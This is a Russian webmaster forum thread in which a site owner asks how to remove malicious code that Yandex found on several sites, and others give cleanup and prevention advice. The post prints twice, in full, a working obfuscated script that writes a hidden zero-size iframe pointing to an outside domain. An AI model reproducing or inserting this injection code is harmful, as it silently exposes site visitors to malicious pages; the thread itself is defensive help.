- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Яндекс нашел вредоносный код на сайте. В панели вебмастера сообщил это...
Вот собственно код. Откуда он мог взяться? Суть в том, что еще парочка сайтов на моем аккаунте хостинга с тем же кодом. Как можно от него избавиться? Что делать?
<!-- o65 --><script>function pc67bfc72c(pc){var u3='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q2='';var uc,s6,tc,y7,ra,x3,t4;var n4=0;do{y7=u3.indexOf(pc.charAt(n4++));ra=u3.indexOf(pc.charAt(n4++));x3=u3.indexOf(pc.charAt(n4++));t4=u3.indexOf(pc.charAt(n4++));uc=(y7<<2)|(ra>>4);s6=((ra&15)<<4)|(x3>>2);tc=((x3&3)<<6)|t4;if(uc>=192)uc+=848;else if(uc==168)uc=1025;else if(uc==184)uc=1105;q2+=String.fromCharCode(uc);if(x3!=64){if(s6>=192)s6+=848;else if(s6==168)s6=1025;else if(s6==184)s6=1105;q2+=String.fromCharCode(s6);}if(t4!=64){if(tc>=192)tc+=848;else if(tc==168)tc=1025;else if(tc==184)tc=1105;q2+=String.fromCharCode(tc);}}while(n4<pc.length);document.write(q2);};pc67bfc72c('PGRpdiBzdHlsZT0idmlzaWJpbGl0eTpoaWRkZW4iPjxpZnJhbWUgc3JjPSJodHRwOi8vYWxsZXZvcnVuLmJpei9rb2tvdnMvc3Y3NzcvaW5kZXgucGhwIiB3aWR0aD0wIGhlaWdodD0wPjwvaWZyYW1lPjwvZGl2PgAA');</script><!-- c65 --><!-- o65 --><script>function pc67bfc72c(pc){var u3='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q2='';var uc,s6,tc,y7,ra,x3,t4;var n4=0;do{y7=u3.indexOf(pc.charAt(n4++));ra=u3.indexOf(pc.charAt(n4++));x3=u3.indexOf(pc.charAt(n4++));t4=u3.indexOf(pc.charAt(n4++));uc=(y7<<2)|(ra>>4);s6=((ra&15)<<4)|(x3>>2);tc=((x3&3)<<6)|t4;if(uc>=192)uc+=848;else if(uc==168)uc=1025;else if(uc==184)uc=1105;q2+=String.fromCharCode(uc);if(x3!=64){if(s6>=192)s6+=848;else if(s6==168)s6=1025;else if(s6==184)s6=1105;q2+=String.fromCharCode(s6);}if(t4!=64){if(tc>=192)tc+=848;else if(tc==168)tc=1025;else if(tc==184)tc=1105;q2+=String.fromCharCode(tc);}}while(n4<pc.length);document.write(q2);};pc67bfc72c('PGRpdiBzdHlsZT0idmlzaWJpbGl0eTpoaWRkZW4iPjxpZnJhbWUgc3JjPSJodHRwOi8vYWxsZXZvcnVuLmJpei9rb2tvdnMvc3Y3NzcvaW5kZXgucGhwIiB3aWR0aD0wIGhlaWdodD0wPjwvaWZyYW1lPjwvZGl2PgAA');</script><!-- c65 -->
Лечи комп.
А взяться мог например через сохраненый доступ в FileZile или любой другой ФТП клиент.
И меняй доступы.
Проверь все страницы сайта и удалить код...
Можно допустим через notepad++ (открыл один корневой файл контр+F) найти в файлах и указываеш папку с сайтом (проверять можно если разбить этот код на части, ограничение в символах имется)
А лучше залить бекап...
Смотри дату изменения файлов на сервере, если есть бекап до этой даты, то, как уже сказали, проще всего залить бекап.
Если же нет, ищи говнямбу во всех файлах.
Поможет текстовый редактор с функцией пакетной замены. Например homesite.
Искать по приведенному выше коду, далее по следующим признакам:
iframe как правило с нулевым размером и хттп://че-то-там внутри.
base64_decode это в принципе приличная функция ПХП, но иногда используется под всякую говнямбу.
eval аналогично предыдущему. С этими двумя поаккуратнее, чтобы не покрошить лишнего. Если сайт в статике, то кроши смело.
Все файлы *.js проверить на наличие сомнительных http:// внутри, если есть, то вычищать вместе с инициализирующей функцией.
Файл gifimg.php последнее время часто появляется вместе с вирусом, прячется в папках типа /images/ или /img/. Если он есть, то прибивать смело.
После того как все вычищено:
обновляем антивирь, сканим комп
меняем ФТП-пароль
больше никогда не сохраняем пароль в клиентах
Заливаем на сервер.
Также смотрим в выдаче Я и Г - если присутствует сообщение об опасности, то лезем в вебмастер и отправляем запрос на амнистию.
Вроде все, надеюсь, что помог.
у меня такое несколько раз было на разных хостингах.
Обычно это скрипты с редиректом на другой сайт или еще что нить.
\
Просто нужно удалить все эти скрипты из файлов, обычно они располагаются всегда внизу и в основном в htm и html файлах, иногда в php.
Да, и пароль на FTP поменяй, а то сново появятся скрипты.
Обычное дело дырявые скрипты не закрытые директории, спертые пароли
Страничка просто вылетает из индекса, удалите код покопайтесь в логах заклейте дыры, если есть.
Через неделю Страница будет в Янденксе.
У меня недавно из Far-а вытащили пароли и прошлись по десятку сайтов.
Теперь пользуюсь FlashFXP, он позволяет пароль на доступ создавать, правда не уверен, что он не снимается :)))
Самый серьезный вариант - виртуальная машина, в которой разрешен запуск только одной программы - ftp-клиента.
Откуда он мог взяться?
банальный взлом фтп
лечим свой камп антивирусом, пеняем пароль на фтп и нигде его не храним, тем более в тотале и тд. и потом удаляем код с каждой страницы сайта
он позволяет пароль на доступ создавать
Пароль, пароль на доступ к паролю, пароль к паролю на доступ к паролю... любой пароль можно украсть.
Пароль, пароль на доступ к паролю, пароль к паролю на доступ к паролю... любой пароль можно украсть.
Любой сервер можно взломать. И не надо пароли красть.
Не факт, что это скрипты или вирусы. Еще бывает и дырявое ПО на сервере. У нас как-то получили доступ к серверу через дырку в ФТП сервере. Обновили ПО, проверили на руткиты, поставили фаервол на сервер. Уже больше года все впорядке.
У меня недавно из Far-а вытащили пароли и прошлись по десятку сайтов.
Теперь пользуюсь FlashFXP, он позволяет пароль на доступ создавать, правда не уверен, что он не снимается :)))
Самый серьезный вариант - виртуальная машина, в которой разрешен запуск только одной программы - ftp-клиента.
Это не факт что вас словмали именно так...
Хотя если вы использовали левую сборку ...
или открыты для доступа...
Не факт, что это скрипты или вирусы. Еще бывает и дырявое ПО на сервере. У нас как-то получили доступ к серверу через дырку в ФТП сервере. Обновили ПО, проверили на руткиты, поставили фаервол на сервер. Уже больше года все впорядке.
50% вирусов селется на хостах в следствии дрявых скриптов..
Проверенно!
Х спайдер не паноцея но иногда помогает этого избежать!
(не рекламма)